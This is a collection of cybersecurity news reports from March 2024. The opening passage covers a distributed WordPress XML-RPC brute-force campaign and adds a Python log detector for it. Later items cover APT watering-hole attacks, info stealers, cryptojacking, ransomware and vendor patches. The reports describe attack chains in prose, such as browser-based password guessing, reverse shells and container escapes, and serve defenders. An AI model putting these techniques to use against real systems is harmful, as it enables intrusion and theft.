The activity is part of a previously documented attack wave in which compromised WordPress sites were used to inject crypto drainers such as Angel Drainer directly or redirect site visitors to Web3 phishing sites containing drainer malware.
The latest iteration is notable for the fact that the injections – found on over 700 sites to date – don't load a drainer but rather use a list of common and leaked passwords to brute-force other WordPress sites.
The attack unfolds over five stages, enabling a threat actor to take advantage of already compromised websites to launch distributed brute-force attacks against other potential victim sites -
Obtaining a list of target WordPress sites
Extracting real usernames of authors that post on those domains
Injecting the malicious JavaScript code into already infected WordPress sites
Launching a distributed brute-force attack on the target sites via the browser when visitors land on the hacked sites
Gaining unauthorized access to the target sites
"For every password in the list, the visitor's browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request," Sinegubko explained. "If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory."
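On the receiving end, the distributed design matters for detection: each visitor browser sends only a handful of xmlrpc.php requests, so per-IP lockout rules never fire. The detector below, added here as an example and not Sucuri's tooling, parses Combined Log Format lines (constructed samples, not real traffic) and alerts on windows where xmlrpc.php POSTs spike in aggregate while every source IP stays under a per-IP threshold. Using the Referer to identify the injected site that launched the requests is an assumption about browser behaviour that the page does not state.

```python
"""Detect the browser-launched, distributed xmlrpc.php brute force described
above. Example code added for this page, not Sucuri's tooling. Log lines are
constructed samples in Combined Log Format."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def _xmlrpc_line(ip: str, ts: str, referer: str) -> str:
    # XML-RPC faults come back as HTTP 200, so status is not a failure signal;
    # the detector therefore counts requests rather than error codes.
    return f'{ip} - - [{ts}] "POST /xmlrpc.php HTTP/1.1" 200 370 "{referer}" "Mozilla/5.0"'


# Constructed sample: 40 visitor IPs, one xmlrpc.php POST each inside one
# minute, all launched from the same compromised site, plus ordinary traffic.
SAMPLE_LOG = "\n".join(
    [_xmlrpc_line(f"198.51.100.{i}", f"10/Mar/2024:12:00:{i:02d} +0000",
                  "https://compromised.example/") for i in range(40)]
    + ['203.0.113.7 - - [10/Mar/2024:12:00:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
       '203.0.113.7 - - [10/Mar/2024:12:00:11 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'])


def parse_log(text: str) -> List[dict]:
    """Parse Combined Log Format lines; unparseable lines are skipped."""
    events = []
    for raw in text.splitlines():
        m = LOG_RE.match(raw)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], TS_FMT)
            events.append(e)
    return events


def detect_distributed_xmlrpc(text: str, window: timedelta = timedelta(minutes=1),
                              aggregate_threshold: int = 30,
                              per_ip_threshold: int = 5) -> List[dict]:
    """One alert per window whose xmlrpc.php POST total reaches
    aggregate_threshold while no single IP exceeds per_ip_threshold: the
    signature of many browsers each contributing a few attempts."""
    hits = [e for e in parse_log(text)
            if e["method"] == "POST"
            and e["path"].split("?", 1)[0].endswith("/xmlrpc.php")]
    buckets: Dict[datetime, List[dict]] = defaultdict(list)
    span = window.total_seconds()
    for e in hits:
        epoch = e["ts"].timestamp()
        start = datetime.fromtimestamp(epoch - epoch % span, tz=e["ts"].tzinfo)
        buckets[start].append(e)
    alerts = []
    for start, events in sorted(buckets.items()):
        per_ip: Dict[str, int] = defaultdict(int)
        per_ref: Dict[str, int] = defaultdict(int)
        for e in events:
            per_ip[e["ip"]] += 1
            per_ref[e["referer"]] += 1
        if len(events) >= aggregate_threshold and max(per_ip.values()) <= per_ip_threshold:
            alerts.append({
                "window_start": start.isoformat(),
                "requests": len(events),
                "distinct_ips": len(per_ip),
                # Referers ranked by volume point at the site hosting the script.
                "top_referers": sorted(per_ref.items(), key=lambda kv: -kv[1])[:3],
            })
    return alerts
```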
It's currently not known what prompted the threat actors to switch from crypto drainers to distributed brute-force attacks, although it's believed that the change may have been driven by profit motives, as compromised WordPress sites could be monetized in various ways.
That said, crypto wallet drainers have led to losses amounting to hundreds of millions in digital assets in 2023, according to data from Scam Sniffer. The Web3 anti-scam solution provider has since revealed that drainers are exploiting the normalization process in the wallet's EIP-712 encoding procedure to bypass security alerts.
The development comes as the DFIR report revealed that threat actors are exploiting a critical flaw in a WordPress plugin named 3DPrint Lite (CVE-2021-4436, CVSS score: 9.8) to deploy the Godzilla web shell for persistent remote access.
It also follows a new SocGholish (aka FakeUpdates) campaign targeting WordPress websites in which the JavaScript malware is distributed via modified versions of legitimate plugins that are installed by taking advantage of compromised admin credentials.
"Although there have been a variety of maliciously modified plugins and several different fake-browser update campaigns, the goal of course is always the same: To trick unsuspecting website visitors into downloading remote access trojans that will later be used as the initial point of entry for a ransomware attack," security researcher Ben Martin said.
Chinese State Hackers Target Tibetans with Supply Chain, Watering Hole Attacks
7.3.24
BigBrothers
The Hacker News
The China-linked threat actor known as Evasive Panda orchestrated both watering hole and supply chain attacks targeting Tibetan users at least since September 2023.
The end goal of the attacks is to deliver malicious downloaders for Windows and macOS that deploy a known backdoor called MgBot and a previously undocumented Windows implant known as Nightdoor.
The findings come from ESET, which said the attackers compromised at least three websites to carry out watering-hole attacks as well as a supply-chain compromise of a Tibetan software company. The operation was discovered in January 2024.
Evasive Panda, active since 2012 and also known as Bronze Highland and Daggerfly, was previously disclosed by the Slovak cybersecurity firm in April 2023 as having targeted an international non-governmental organization (NGO) in Mainland China with MgBot.
Another report from Broadcom-owned Symantec around the same time implicated the adversary in a cyber espionage campaign aimed at infiltrating telecom services providers in Africa at least since November 2022.
The latest set of cyber assaults entails the strategic web compromise of the Kagyu International Monlam Trust's website ("www.kagyumonlam[.]org").
"The attackers placed a script in the website that verifies the IP address of the potential victim and if it is within one of the targeted ranges of addresses, shows a fake error page to entice the user to download a 'fix' named certificate," ESET researchers said.
"This file is a malicious downloader that deploys the next stage in the compromise chain." The IP address checks show that the attack is specifically designed to target users in India, Taiwan, Hong Kong, Australia, and the U.S.
It's suspected that Evasive Panda capitalized on the annual Kagyu Monlam Festival that took place in India in late January and February 2024 to target the Tibetan community in several countries and territories.
The executable – named "certificate.exe" on Windows and "certificate.pkg" for macOS – serves as a launchpad for loading the Nightdoor implant, which, subsequently, abuses the Google Drive API for command-and-control (C2).
In addition, the campaign is notable for infiltrating an Indian software company's website ("monlamit[.]com") and supply chain in order to distribute trojanized Windows and macOS installers of the Tibetan language translation software. The compromise occurred in September 2023.
"The attackers also abused the same website and a Tibetan news website called Tibetpost – tibetpost[.]net – to host the payloads obtained by the malicious downloads, including two full-featured backdoors for Windows and an unknown number of payloads for macOS," the researchers noted.
The trojanized Windows installer, for its part, triggers a sophisticated multi-stage attack sequence to either drop MgBot or Nightdoor, signs of which have been detected as early as 2020.
The backdoor comes equipped with features to gather system information, a list of installed apps, and running processes; spawn a reverse shell; perform file operations; and uninstall itself from the infected system.
"The attackers fielded several downloaders, droppers, and backdoors, including MgBot – which is used exclusively by Evasive Panda – and Nightdoor: the latest major addition to the group's toolkit and which has been used to target several networks in East Asia," ESET said.
Ex-Google Engineer Arrested for Stealing AI Technology Secrets for China
7.3.24
AI
The Hacker News
The U.S. Department of Justice (DoJ) announced the indictment of a 38-year-old Chinese national and California resident for allegedly stealing proprietary information from Google while covertly working for two China-based tech companies.
Linwei Ding (aka Leon Ding), a former Google engineer who was arrested on March 6, 2024, "transferred sensitive Google trade secrets and other confidential information from Google's network to his personal account while secretly affiliating himself with PRC-based companies in the AI industry," the DoJ said.
The defendant is said to have pilfered from Google over 500 confidential files containing artificial intelligence (AI) trade secrets with the goal of passing them on to two unnamed Chinese companies looking to gain an edge in the ongoing AI race.
"While Linwei Ding was employed as a software engineer at Google, he was secretly working to enrich himself and two companies based in the People's Republic of China," said U.S. Attorney Ismail Ramsey.
"By stealing Google's trade secrets about its artificial intelligence supercomputing systems, Ding gave himself and the companies that he affiliated with in the PRC an unfair competitive advantage."
Ding, who joined Google as a software engineer in 2019, has been accused of siphoning proprietary information related to the company's supercomputing data center infrastructure used for running AI models, the Cluster Management System (CMS) software for managing the data centers, and the AI models and applications they supported.
The theft happened from May 21, 2022, until May 2, 2023, to a personal Google Cloud account, the indictment alleged, adding Ding secretly affiliated himself with two tech companies based in China.
This included one firm in which he was offered the position of chief technology officer sometime around June 2022 and another company founded by Ding himself by no later than May 30, 2023, acting as its chief executive officer.
"Ding's company touted the development of a software platform designed to accelerate machine learning workloads, including training large AI models," the DoJ said.
"A document related to Ding's startup company stated, 'we have experience with Google's ten-thousand-card computational power platform; we just need to replicate and upgrade it – and then further develop a computational power platform suited to China's national conditions.'"
But in an interesting twist, Ding took steps to conceal the theft of trade secrets by purportedly copying the data from Google source files into the Apple Notes application on his company-provided MacBook and then converting the notes to PDF files before uploading them to his personal Google account.
Furthermore, Ding allegedly allowed another Google employee in December 2023 to use his Google-issued access badge to scan into the entrance of a Google building, giving the impression that he was working from his U.S. Google office when, in fact, he was in China. He resigned from Google on December 26, 2023.
Ding has been charged with four counts of theft of trade secrets. If convicted, he faces a maximum penalty of 10 years in prison and up to a $250,000 fine for each count.
The development comes days after the DoJ arrested and indicted David Franklin Slater, a civilian employee of the U.S. Air Force assigned to the U.S. Strategic Command (USSTRATCOM), for transmitting classified information on a foreign online dating platform between February and April 2022.
The information included National Defense Information (NDI) pertaining to military targets and Russian military capabilities relating to Russia's invasion of Ukraine. It's said to have been sent to a co-conspirator, who claimed to be a female living in Ukraine, via the dating website's messaging feature.
"Slater willfully, improperly, and unlawfully transmitted NDI classified as 'SECRET,' which he had reason to believe could be used to the injury of the United States or to the advantage of a foreign nation, on a foreign online dating platform to a person not authorized to receive such information," the DoJ said.
Slater, 63, faces up to 10 years in prison, three years of supervised release, and a maximum monetary penalty of $250,000 for each count of conspiracy to transmit and the transmission of NDI. No details are known about the motives or the real identity of the individual posing as a Ukrainian woman.
New Python-Based Snake Info Stealer Spreading Through Facebook Messages
7.3.24
Virus
The Hacker News
Facebook messages are being used by threat actors to deliver a Python-based information stealer dubbed Snake that's designed to capture credentials and other sensitive data.
"The credentials harvested from unsuspecting users are transmitted to different platforms such as Discord, GitHub, and Telegram," Cybereason researcher Kotaro Ogino said in a technical report.
Details about the campaign first emerged on the social media platform X in August 2023. The attacks entail sending prospective users seemingly innocuous RAR or ZIP archive files that, upon opening, activate the infection sequence.
The intermediate stages involve two downloaders – a batch script and a cmd script – with the latter responsible for downloading and executing the information stealer from an actor-controlled GitLab repository.
Cybereason said it detected three different variants of the stealer, the third one being an executable assembled by PyInstaller. The malware, for its part, is designed to gather data from different web browsers, including Cốc Cốc, suggesting a Vietnamese focus.
The collected information, which comprises credentials and cookies, is then exfiltrated in the form of a ZIP archive via the Telegram Bot API. The stealer is also designed to dump cookie information specific to Facebook, an indication that the threat actor is likely looking to hijack the accounts for their own purposes.
The Vietnamese connection is further bolstered by the naming convention of the GitHub and GitLab repositories and the fact that the source code contains references to the Vietnamese language.
"All of the variants support Cốc Cốc Browser, which is a well known Vietnamese Browser used widely by the Vietnamese community," Ogino said.
Over the past year, multiple information stealers targeting Facebook cookies have appeared in the wild, counting S1deload Stealer, MrTonyScam, NodeStealer, and VietCredCare.
The development comes as Meta has come under criticism in the U.S. for failing to assist victims whose accounts have been hacked into, calling on the company to take immediate action to address a "dramatic and persistent spike" in account takeover incidents.
It also follows a discovery that threat actors are "using a cloned game cheat website, SEO poisoning, and a bug in GitHub to trick would-be-game-hackers into running Lua malware," according to OALABS Research.
Specifically, the malware operators are leveraging a GitHub vulnerability that allows an uploaded file associated with an issue on a repository to persist even in scenarios where the issue is never saved.
"This means that anyone can upload a file to any git repository on GitHub, and not leave any trace that the file exists except for the direct link," the researchers said, adding the malware comes fitted with capabilities for command-and-control (C2) communications.
Watch Out for Spoofed Zoom, Skype, Google Meet Sites Delivering Malware
7.3.24
Virus
The Hacker News
Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.
"The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems," Zscaler ThreatLabz researchers said.
The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.
They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.
The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.
Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.
"A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files," the researchers said.
The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.
It's said to be active from at least late 2022, targeting Asian countries like China, Hong Kong, Japan, and Singapore, among others. That said, it's currently not known how the malware is distributed in the wild.
"When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server," ASEC said. "The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files."
It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activities intensifying post mid-2023.
"TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials," Proofpoint said. "The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others."
Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.
Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.
Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.
Hackers Exploit Misconfigured YARN, Docker, Confluence, Redis Servers for Crypto Mining
7.3.24
Exploit
The Hacker News
Threat actors are targeting misconfigured and vulnerable servers running Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis services as part of an emerging malware campaign designed to deliver a cryptocurrency miner and spawn a reverse shell for persistent remote access.
"The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an N-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts," Cado security researcher Matt Muir said in a report shared with The Hacker News.
The activity has been codenamed Spinning YARN by the cloud security company, with overlaps to cloud attacks attributed to TeamTNT, WatchDog, and a cluster dubbed Kiss-a-dog.
It all starts with deploying four novel Golang payloads that are capable of automating the identification and exploitation of susceptible Confluence, Docker, Hadoop YARN, and Redis hosts. The spreader utilities leverage masscan or pnscan to hunt for these services.
"For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," Muir explained.
The initial access then paves the way for the deployment of additional tools to install rootkits like libprocesshider and diamorphine to conceal malicious processes, drop the Platypus open-source reverse shell utility, and ultimately launch the XMRig miner.
"It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments," the company said.
The development comes as Uptycs revealed 8220 Gang's exploitation of known security flaws in Apache Log4j (CVE-2021-44228) and Atlassian Confluence Server and Data Center (CVE-2022-26134) as part of a wave of assaults targeting cloud infrastructure from May 2023 through February 2024.
"By leveraging internet scans for vulnerable applications, the group identifies potential entry points into cloud systems, exploiting unpatched vulnerabilities to gain unauthorized access," security researchers Tejaswini Sandapolla and Shilpesh Trivedi said.
"Once inside, they deploy a series of advanced evasion techniques, demonstrating a profound understanding of how to navigate and manipulate cloud environments to their advantage. This includes disabling security enforcement, modifying firewall rules, and removing cloud security services, thereby ensuring their malicious activities remain undetected."
The attacks, which single out both Windows and Linux hosts, aim to deploy a cryptocurrency miner, but not before taking a series of steps that prioritize stealth and evasion.
It also follows the abuse of cloud services primarily meant for artificial intelligence (AI) solutions to drop cryptocurrency miners as well as host malware.
"With both mining and AI requiring access to large amounts of GPU processing power, there's a certain degree of transferability to their base hardware environments," HiddenLayer noted last year.
Cado, in its H2 2023 Cloud Threat Findings Report, noted that threat actors are increasingly targeting cloud services that require specialist technical knowledge to exploit, and that cryptojacking is no longer the only motive.
"With the discovery of new Linux variants of ransomware families, such as Abyss Locker, there is a worrying trend of ransomware on Linux and ESXi systems," it said. "Cloud and Linux infrastructure is now subject to a broader variety of attacks."
Exit Scam: BlackCat Ransomware Group Vanishes After $22 Million Payout
7.3.24
Ransom
The Hacker News
The threat actors behind the BlackCat ransomware have shut down their darknet website and likely pulled an exit scam after uploading a bogus law enforcement seizure banner.
"ALPHV/BlackCat did not get seized. They are exit scamming their affiliates," security researcher Fabian Wosar said. "It is blatantly obvious when you check the source code of the new takedown notice."
"There is absolutely zero reason why law enforcement would just put a saved version of the takedown notice up during a seizure instead of the original takedown notice."
The U.K.'s National Crime Agency (NCA) told Reuters that it had no connection to any disruptions to the BlackCat infrastructure.
Recorded Future security researcher Dmitry Smilyanets posted screenshots on the social media platform X in which the BlackCat actors claimed that the "feds screwed us over" and that they intended to sell the ransomware's source code for $5 million.
The disappearing act comes after the group allegedly received a $22 million ransom payment from UnitedHealth's Change Healthcare unit (Optum) and refused to share the proceeds with an affiliate that had carried out the attack.
The company has not commented on the alleged ransom payment, instead stating it's only focused on investigation and recovery aspects of the incident.
According to DataBreaches, the disgruntled affiliate – who had their account suspended by the administrative staff – made the allegations on the RAMP cybercrime forum. "They emptied the wallet and took all the money," they said.
This has raised speculations that BlackCat has staged an exit scam to evade scrutiny and resurface in the future under a new brand. "A re-branding is pending," a now-former admin of the ransomware group was quoted as saying.
Menlo Security, citing HUMINT sources with direct contact to the affiliate, described them as likely associated with Chinese nation-state groups. The affiliate, who goes by the name Notchy, is said to have engaged on ransomware-related topics in the RAMP forum as early as 2021.
BlackCat had its infrastructure seized by law enforcement in December 2023, but the e-crime gang managed to wrest back control of its servers and restart its operations without any major consequences. The group previously operated under the monikers DarkSide and BlackMatter.
"Internally, BlackCat may be worried about moles within their group, and closing up shop preemptively could stop a takedown before it occurs," Malachi Walker, a security advisor with DomainTools, said.
"On the other hand, this exit scam might simply be an opportunity for BlackCat to take the cash and run. Since crypto is once again at an all-time high, the gang can get away with selling their product 'high.' In the cybercrime world, reputation is everything, and BlackCat seems to be burning bridges with its affiliates with these actions."
The group's apparent demise and the abandonment of its infrastructure come as malware research group VX-Underground reported that the LockBit ransomware operation no longer supports Lockbit Red (aka Lockbit 2.0) and StealBit, a custom tool used by the threat actor for data exfiltration.
LockBit has also tried to save face by moving some of its activities to a new dark web portal after a coordinated law enforcement operation took down its infrastructure last month following a months-long investigation.
It also comes as Trend Micro revealed that the ransomware family known as RA World (formerly RA Group) has successfully infiltrated healthcare, finance, and insurance companies in the U.S., Germany, India, Taiwan, and other countries since emerging in April 2023.
Attacks mounted by the group "involve multi-stage components designed to ensure maximum impact and success in the group's operations," the cybersecurity firm noted.
U.S. Cracks Down on Predatory Spyware Firm for Targeting Officials and Journalists
6.3.24
Virus
The Hacker News
The U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) sanctioned two individuals and five entities associated with the Intellexa Alliance for their role in "developing, operating, and distributing" commercial spyware designed to target government officials, journalists, and policy experts in the country.
"The proliferation of commercial spyware poses distinct and growing security risks to the United States and has been misused by foreign actors to enable human rights abuses and the targeting of dissidents around the world for repression and reprisal," the agency said.
"The Intellexa Consortium, which has a global customer base, has enabled the proliferation of commercial spyware and surveillance technologies around the world, including to authoritarian regimes."
The Intellexa Alliance is a consortium of several companies, including Cytrox, linked to a mercenary spyware solution called Predator. In July 2023, the U.S. government added Cytrox and Intellexa, as well as their corporate holdings in Hungary, Greece, and Ireland, to the Entity List.
Predator, much like NSO Group's Pegasus, can infiltrate Android and iOS devices using zero-click attacks that require no user interaction. Once installed, the spyware makes it possible for the operators to harvest sensitive data and surveil targets of interest.
OFAC said unspecified foreign actors had deployed Predator against U.S. government officials, journalists, and policy experts.
"In the event of a successful Predator infection, the spyware's operators can access and retrieve sensitive information including contacts, call logs, and messaging information, microphone recordings, and media from the device," the Treasury Department said.
The sanctions designations apply to the following individuals and entities -
Tal Jonathan Dilian (Dilian), the founder of the Intellexa Consortium
Sara Aleksandra Fayssal Hamou (Hamou), a corporate off-shoring specialist who has provided managerial services to the Intellexa Consortium
Intellexa S.A., a Greece-based software development company
Intellexa Limited, an Ireland-based company
Cytrox AD, a North Macedonia-based company that's responsible for the development of Predator
Cytrox Holdings Zartkoruen Mukodo Reszvenytarsasag (Cytrox Holdings ZRT), a Hungary-based entity
Thalestris Limited, an Ireland-based entity that holds distribution rights to the Predator spyware
It's worth noting that Intellexa S.A., Intellexa Limited, Cytrox AD, and Cytrox Holdings ZRT were added to the aforementioned economic blocklist last year.
The development comes as new revelations about Predator's multi-tiered delivery infrastructure from Recorded Future and Sekoia prompted the operators to shut down their servers.
The sanctions targeting the makers of Predator also arrived after the U.S. government unveiled a new policy last month that will allow it to impose visa restrictions on foreign individuals involved in the misuse of commercial spyware.
Citizen Lab security researcher John Scott-Railton described the OFAC designations as a huge deal, stating they mark the "first time they're used against a mercenary spyware company."
"The United States remains focused on establishing clear guardrails for the responsible development and use of these technologies while also ensuring the protection of human rights and civil liberties of individuals around the world," said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson.
VMware Issues Security Patches for ESXi, Workstation, and Fusion Flaws
6.3.24
Vulnerability
The Hacker News
VMware has released patches to address four security flaws impacting ESXi, Workstation, and Fusion, including two critical flaws that could lead to code execution.
Tracked as CVE-2024-22252 and CVE-2024-22253, the vulnerabilities have been described as use-after-free bugs in the XHCI USB controller. They carry a CVSS score of 9.3 for Workstation and Fusion, and 8.4 for ESXi systems.
"A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host," the company said in a new advisory.
"On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed."
Multiple security researchers associated with the Ant Group Light-Year Security Lab and QiAnXin have been credited with independently discovering and reporting CVE-2024-22252. Security researchers VictorV and Wei have been acknowledged for reporting CVE-2024-22253.
Also patched by the Broadcom-owned virtualization services provider are two other shortcomings -
CVE-2024-22254 (CVSS score: 7.9) - An out-of-bounds write vulnerability in ESXi that a malicious actor with privileges within the VMX process could exploit to trigger a sandbox escape.
CVE-2024-22255 (CVSS score: 7.9) - An information disclosure vulnerability in the UHCI USB controller that an attacker with administrative access to a virtual machine may exploit to leak memory from the VMX process.
The issues have been addressed in the following versions, including those that have reached end-of-life (EoL) due to the severity of these issues -
ESXi 6.5 - 6.5U3v
ESXi 6.7 - 6.7U3u
ESXi 7.0 - ESXi70U3p-23307199
ESXi 8.0 - ESXi80U2sb-23305545 and ESXi80U1d-23299997
VMware Cloud Foundation (VCF) 3.x
Workstation 17.x - 17.5.1
Fusion 13.x (macOS) - 13.5.1
As a temporary workaround until a patch can be deployed, customers have been asked to remove all USB controllers from the virtual machine.
"In addition, virtual/emulated USB devices, such as VMware virtual USB stick or dongle, will not be available for use by the virtual machine," the company said. "In contrast, the default keyboard/mouse as input devices are not affected as they are, by default, not connected through USB protocol but have a driver that does software device emulation in the guest OS."
Alert: GhostSec and Stormous Launch Joint Ransomware Attacks in Over 15 Countries
6.3.24
Ransom
The Hacker News
The cybercrime group called GhostSec has been linked to a Golang variant of a ransomware family called GhostLocker.
"The GhostSec and Stormous ransomware groups are jointly conducting double extortion ransomware attacks on various business verticals in multiple countries," Cisco Talos researcher Chetan Raghuprasad said in a report shared with The Hacker News.
"GhostLocker and Stormous ransomware have started a new ransomware-as-a-service (RaaS) program STMX_GhostLocker, providing various options for their affiliates."
Attacks mounted by the group have targeted victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia.
Some of the most impacted business verticals include technology, education, manufacturing, government, transportation, energy, medicolegal, real estate, and telecom.
GhostSec – not to be confused with Ghost Security Group (which is also called GhostSec) – is part of a coalition called The Five Families, which also includes ThreatSec, Stormous, Blackforums, and SiegedSec.
It was formed in August 2023 to "establish better unity and connections for everyone in the underground world of the internet, to expand and grow our work and operations."
Late last year, the cybercrime group ventured into ransomware-as-a-service (RaaS) with GhostLocker, offering it to other actors for $269.99 per month. Soon after, the Stormous ransomware group announced that it will use Python-based ransomware in its attacks.
The latest findings from Talos show that the two groups have banded together to not only strike a wide range of sectors, but also unleash an updated version of GhostLocker in November 2023 as well as start a new RaaS program in 2024 called STMX_GhostLocker.
"The new program is made up of three categories of services for the affiliates: paid, free, and another for the individuals without a program who only want to sell or publish data on their blog (PYV service)," Raghuprasad explained.
STMX_GhostLocker, which comes with its own leak site on the dark web, lists no less than six victims from India, Uzbekistan, Indonesia, Poland, Thailand, and Argentina.
GhostLocker 2.0 (aka GhostLocker V2) is written in Go and has been advertised as fully effective and offering speedy encryption/decryption capabilities. It also comes with a revamped ransom note that urges victims to get in touch with them within seven days or risk getting their stolen data leaked.
The RaaS scheme also allows affiliates to track their operations, monitor encryption status, and payments through a web panel. They are also provided with a builder that makes it possible to configure the locker payload according to their preferences, including the directories to encrypt and the processes and services to be terminated before commencing the encryption process.
Once deployed, the ransomware establishes a connection with a command-and-control (C2) panel and proceeds with the encryption routine, but not before killing the defined processes or services and exfiltrating files matching a specific list of extensions.
Talos said it discovered two new tools likely used by GhostSec to compromise legitimate sites. "One of them is the 'GhostSec Deep Scan toolset' to scan legitimate websites recursively, and another is a hack tool to perform cross-site scripting (XSS) attacks called 'GhostPresser,'" Raghuprasad said.
GhostPresser is mainly designed to break into WordPress sites, allowing the threat actors to alter site settings, add new plugins and users, and even install new themes, demonstrating GhostSec's commitment to evolving its arsenal.
"The group themselves has claimed they've used it in attacks on victims, but we don't have any way to validate any of those claims. This tooling would likely be used by the ransomware operators for a variety of reasons," Talos told The Hacker News.
"The deep scan tool could be leveraged to look for ways into victim networks and the GhostPresser tool, in addition to compromising victim websites, could be used to stage payloads for distribution, if they didn't want to use actor infrastructure."
New APT Group 'Lotus Bane' Behind Recent Attacks on Vietnam's Financial Entities
6.3.24
APT
The Hacker News
A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023.
Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that's believed to have been active since at least 2022.
The exact specifics of the infection chain remain unknown as yet, but it involves the use of various malicious artifacts that serve as the stepping stone for the next stage.
"The cybercriminals used methods such as DLL side-loading and data exchange via named pipes to run malicious executables and create remote scheduled tasks for lateral movement," the company said.
Group-IB told The Hacker News that the techniques used by Lotus Bane overlap with those of OceanLotus, a Vietnam-aligned threat actor also known as APT32, Canvas Cyclone (formerly Bismuth), and Cobalt Kitty. This stems from the use of malware like PIPEDANCE for named-pipe communication.
It's worth noting that PIPEDANCE was first documented by Elastic Security Labs in February 2023 in connection with a cyber attack targeting an unnamed Vietnamese organization in late December 2022.
"This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different," Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.
"Lotus Bane is actively engaging in attacks primarily targeting the banking sector in the APAC region. Although the known attack was in Vietnam, the sophistication of their methods indicates the potential for broader geographical operations within APAC. The exact duration of their activity prior to this discovery is currently unclear, but ongoing investigations may shed more light on their history."
The development comes as financial organizations across Asia-Pacific (APAC), Europe, Latin America (LATAM), and North America have been the target of several advanced persistent threat groups such as Blind Eagle and the Lazarus Group over the past year.
Another notable financially motivated threat group is UNC1945, which has been observed targeting ATM switch servers with the goal of infecting them with a custom malware called CAKETAP.
"This malware intercepts data transmitted from the ATM server to the [Hardware Security Module] server and checks it against a set of predefined conditions," Group-IB said. "If these conditions are met, the data is altered before being sent out from the ATM server."
UNC2891 and UNC1945 were previously detailed by Google-owned Mandiant in March 2022 as having deployed the CAKETAP rootkit on Oracle Solaris systems to intercept messages from an ATM switching network and perform unauthorized cash withdrawals at different banks using fraudulent cards.
"The presence and activities of both Lotus Bane and UNC1945 in the APAC region highlight the need for continued vigilance and robust cybersecurity measures," Tikhonova said. "These groups, with their distinct tactics and targets, underline the complexity of protecting against financial cyber threats in today's digital landscape."
Urgent: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws
6.3.24
OS
The Hacker News
Apple has released security updates to address several security flaws, including two vulnerabilities that it said have been actively exploited in the wild.
The shortcomings are listed below -
CVE-2024-23225 - A memory corruption issue in Kernel that an attacker with arbitrary kernel read and write capability can exploit to bypass kernel memory protections
CVE-2024-23296 - A memory corruption issue in the RTKit real-time operating system (RTOS) that an attacker with arbitrary kernel read and write capability can exploit to bypass kernel memory protections
It's currently not clear how the flaws are being weaponized in the wild. Apple said both vulnerabilities were addressed with improved validation in iOS 17.4, iPadOS 17.4, iOS 16.7.6, and iPadOS 16.7.6.
The updates are available for the following devices -
iOS 16.7.6 and iPadOS 16.7.6 - iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
iOS 17.4 and iPadOS 17.4 - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
